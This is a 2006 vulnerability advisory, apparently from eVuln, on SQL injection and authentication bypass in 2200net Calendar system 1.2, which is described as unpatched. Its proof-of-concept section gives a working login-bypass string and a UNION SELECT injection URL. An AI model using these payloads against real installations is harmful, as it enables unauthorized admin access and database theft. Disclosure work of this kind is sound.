SQL-inj and Auth Bypass in 2200net Calendar system
Summary
- Vulnerability
- SQL-inj and Auth Bypass in 2200net Calendar system
- Discovered
- 2006.02.05
- Last Update
- 2006.02.15 Exploitation code published
- ID
- EV0062
- CVE
- CVE-2006-0610
- Risk Level
- medium
- Type
- SQL Injection
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- 2200net Calendar system (http://calendar.2200net.com/)
- Version
- 1.2
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL Injection found in 2200net Calendar system (http://calendar.2200net.com/) script.
1. SQL Injection.
Vulnerable script: program/calendar/calendar.php
Variable fm_data[id] isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off
2. Authentication Bypass.
Vulnerable script: class/classlogin/adminlogin.php
Variable $ad['acc'] isn't properly sanitized. This can be used to make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc - off
PoC/Exploit
Authorization Bypass.
url: http://host/cal/admin.php?ad=login
login account: ' or 1/*
login password: any
SQL Injection Example.
http://host/cal/main.php?&po=calendar&op=calendar_only&fm_data[id]=999'%20union%20select%201,2,3,4,5,6,7,8,9/*
Solution.
Solution for "SQL-inj and Auth Bypass in 2200net Calendar system" is not available. Check vendor's website for updates.